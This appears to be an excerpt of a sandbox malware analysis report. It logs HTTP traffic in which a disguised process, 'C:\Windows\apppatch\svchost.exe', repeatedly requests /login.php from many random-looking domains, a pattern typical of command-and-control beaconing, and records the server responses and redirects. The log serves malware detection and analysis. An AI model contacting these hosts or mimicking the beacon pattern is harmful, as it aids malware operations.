                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: vocyzit.com
                                                                                                                                                                                                          Nov 11, 2024 18:24:05.585838079 CET413INHTTP/1.1 200 OK
                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                          Date: Mon, 11 Nov 2024 17:24:05 GMT
                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                          Set-Cookie: btst=c77ae2807558c30397c0455df2d7e018|66.23.206.109|1731345845|1731345845|0|1|0; path=/; domain=.vocyzit.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                          Set-Cookie: snkz=66.23.206.109; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                          Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                          10192.168.2.84971444.221.84.105801736C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                          Nov 11, 2024 18:24:05.162389040 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: qetyfuv.com
                                                                                                                                                                                                          Nov 11, 2024 18:24:05.586096048 CET413INHTTP/1.1 200 OK
                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                          Date: Mon, 11 Nov 2024 17:24:05 GMT
                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                          Set-Cookie: btst=4dffefe8b4b97e2649265d7c3c16405e|66.23.206.109|1731345845|1731345845|0|1|0; path=/; domain=.qetyfuv.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                          Set-Cookie: snkz=66.23.206.109; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                          Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                          11192.168.2.84971623.253.46.64801736C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                          Nov 11, 2024 18:24:05.446527958 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: gahyqah.com
                                                                                                                                                                                                          Nov 11, 2024 18:24:05.899446011 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                          Server: Microsoft-IIS/7.5
                                                                                                                                                                                                          X-Powered-By: ASP.NET
                                                                                                                                                                                                          Date: Mon, 11 Nov 2024 17:24:00 GMT
                                                                                                                                                                                                          Content-Length: 1245
                                                                                                                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e [TRUNCATED]
                                                                                                                                                                                                          Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>404 - File or directory not found.</title><style type="text/css">...body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;}h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;background-color:#555555;}#content{margin:0 0 0 2%;position:relative;}.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}--></style></head><body><div id="header"><h1>Server Error</h1></div><div id="content"> <div class="content-contai [TRUNCATED]
                                                                                                                                                                                                          Nov 11, 2024 18:24:05.899545908 CET169INData Raw: 20 20 3c 68 33 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 6d 69 67 68 74 20 68 61 76 65 20 62 65 65 6e 20 72 65 6d 6f 76 65 64 2c 20 68 61 64 20 69 74 73 20 6e 61 6d 65 20 63 68 61 6e 67
                                                                                                                                                                                                          Data Ascii: <h3>The resource you are looking for might have been removed, had its name changed, or is temporarily unavailable.</h3> </fieldset></div></div></body></html>


                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                          12192.168.2.84971785.17.31.82801736C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                          Nov 11, 2024 18:24:05.483501911 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: gatyfus.com


                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                          13192.168.2.84971985.17.31.82801736C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                          Nov 11, 2024 18:24:05.902012110 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: gatyfus.com


                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                          14192.168.2.84972213.248.169.48801736C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                          Nov 11, 2024 18:24:10.113722086 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: pupydeq.com
                                                                                                                                                                                                          Nov 11, 2024 18:24:10.543486118 CET259INHTTP/1.1 200 OK
                                                                                                                                                                                                          Server: openresty
                                                                                                                                                                                                          Date: Mon, 11 Nov 2024 17:24:10 GMT
                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                          Content-Length: 114
                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                                                                                          Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander"}</script></head></html>


                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                          15192.168.2.849723188.114.97.3801736C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                          Nov 11, 2024 18:24:10.282461882 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: lysyvan.com
                                                                                                                                                                                                          Nov 11, 2024 18:24:11.027908087 CET795INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                          Date: Mon, 11 Nov 2024 17:24:10 GMT
                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                          Location: https://lysyvan.com/login.php
                                                                                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=49Yp8QEt6EjiDXa15JImklkidiobeNVO2ERpl%2F7WSFSujcMB4mFWVaRBg%2BsYZuD1WUnfge6YjFclRNtzx2yyN3GsUXd02UGQz1XF2yetnApv%2FcCIvWZC9Y7qVG030A%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                          CF-RAY: 8e0ff96e9e0c0ca6-EWR
                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1368&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=243&delivery_rate=0&cwnd=247&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                                          Nov 11, 2024 18:24:11.029441118 CET173INData Raw: 61 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31
                                                                                                                                                                                                          Data Ascii: a2<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>0
                                                                                                                                                                                                          Nov 11, 2024 18:24:13.482103109 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: lysyvan.com
                                                                                                                                                                                                          Nov 11, 2024 18:24:13.833827972 CET973INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                          Date: Mon, 11 Nov 2024 17:24:13 GMT
                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                          Location: https://lysyvan.com/login.php
                                                                                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=niDHSYiX0um5%2FJSBRD9aZmXHsLpavJulgGiHScU%2Bs7kqNEEu2ayNNU7eXP4I0Tde33uOuDcsQuLJpUduiTEq5JLYeAtaQkegX%2F64yew7AumYKhbZY0p5y25Ec%2BOhgg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                          CF-RAY: 8e0ff9808e740ca6-EWR
                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1340&sent=5&recv=7&lost=0&retrans=0&sent_bytes=968&recv_bytes=486&delivery_rate=2000921&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                                          Data Raw: 61 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a
                                                                                                                                                                                                          Data Ascii: a2<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>
                                                                                                                                                                                                          Nov 11, 2024 18:24:13.833839893 CET5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                          Data Ascii: 0
                                                                                                                                                                                                          Nov 11, 2024 18:24:31.294924974 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: lysyvan.com
                                                                                                                                                                                                          Nov 11, 2024 18:24:31.699342012 CET982INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                          Date: Mon, 11 Nov 2024 17:24:31 GMT
                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                          Location: https://lysyvan.com/login.php
                                                                                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hF7G1AF%2BRZzvvCIjztH4%2B%2B%2B8yXXHSYc4nvYVX0mAZNP7BYgZCKfCzc3b6zIl7nxvb1aHFbi9laGlsz4JQtOomUu1qlyN7xrOdt8wpmkrVz6Zo760i8BPwfYwa%2FayOA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                          CF-RAY: 8e0ff9efdf7b0ca6-EWR
                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1326&sent=8&recv=10&lost=0&retrans=0&sent_bytes=1946&recv_bytes=729&delivery_rate=2161194&cwnd=252&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                                          Data Raw: 61 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                          Data Ascii: a2<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>0
                                                                                                                                                                                                          Nov 11, 2024 18:24:34.581680059 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: lysyvan.com
                                                                                                                                                                                                          Nov 11, 2024 18:24:34.922399998 CET981INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                          Date: Mon, 11 Nov 2024 17:24:34 GMT
                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                          Location: https://lysyvan.com/login.php
                                                                                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CYaNhhgdVXRE1SpdoBko1YRP9UJ06%2FqHnMlRvNuvvz01P8i8kG9OzpYZier356YqE%2FsUeoQiT0w7tZzshA3GsW2h37IJDiOXHc%2Bn%2BraEAMwTVtIpqAP7RbPpAhn%2Brw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                          CF-RAY: 8e0ffa046e660ca6-EWR
                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1320&sent=11&recv=13&lost=0&retrans=0&sent_bytes=2928&recv_bytes=972&delivery_rate=2161194&cwnd=4&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                                          Data Raw: 61 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                          Data Ascii: a2<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>0


                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                          16192.168.2.84972418.208.156.248801736C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                          Nov 11, 2024 18:24:10.451445103 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: pupycag.com
                                                                                                                                                                                                          Nov 11, 2024 18:24:10.877619028 CET413INHTTP/1.1 200 OK
                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                          Date: Mon, 11 Nov 2024 17:24:10 GMT
                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                          Set-Cookie: btst=44c79a21644891f33b42e7860178412d|66.23.206.109|1731345850|1731345850|0|1|0; path=/; domain=.pupycag.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                          Set-Cookie: snkz=66.23.206.109; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                          Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                          17192.168.2.8497253.94.10.34801736C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                          Nov 11, 2024 18:24:10.458292007 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: lygynud.com
                                                                                                                                                                                                          Nov 11, 2024 18:24:10.885205984 CET413INHTTP/1.1 200 OK
                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                          Date: Mon, 11 Nov 2024 17:24:10 GMT
                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                          Set-Cookie: btst=0786bcdb46d67d94d9de9fd3d4d02561|66.23.206.109|1731345850|1731345850|0|1|0; path=/; domain=.lygynud.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                          Set-Cookie: snkz=66.23.206.109; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                          Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                          18192.168.2.849726103.150.10.48801736C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                          Nov 11, 2024 18:24:10.620506048 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: lyrysor.com
                                                                                                                                                                                                          Nov 11, 2024 18:24:11.402950048 CET404INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                          Server: openresty/1.15.8.1
                                                                                                                                                                                                          Date: Mon, 11 Nov 2024 17:24:11 GMT
                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                          Content-Length: 151
                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                          Location: http://106.15.232.163:8000/dh/147287063_498544.html#index8?d=lyrysor.com
                                                                                                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 31 35 2e 38 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                          Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty/1.15.8.1</center></body></html>
                                                                                                                                                                                                          Nov 11, 2024 18:24:12.189264059 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: lyrysor.com
                                                                                                                                                                                                          Nov 11, 2024 18:24:12.460268021 CET404INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                          Server: openresty/1.15.8.1
                                                                                                                                                                                                          Date: Mon, 11 Nov 2024 17:24:12 GMT
                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                          Content-Length: 151
                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                          Location: http://106.15.232.163:8000/dh/147287063_498544.html#index8?d=lyrysor.com
                                                                                                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 31 35 2e 38 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                          Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty/1.15.8.1</center></body></html>
                                                                                                                                                                                                          Nov 11, 2024 18:24:31.273379087 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: lyrysor.com
                                                                                                                                                                                                          Nov 11, 2024 18:24:31.543575048 CET404INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                          Server: openresty/1.15.8.1
                                                                                                                                                                                                          Date: Mon, 11 Nov 2024 17:24:31 GMT
                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                          Content-Length: 151
                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                          Location: http://106.15.232.163:8000/dh/147287063_498544.html#index8?d=lyrysor.com
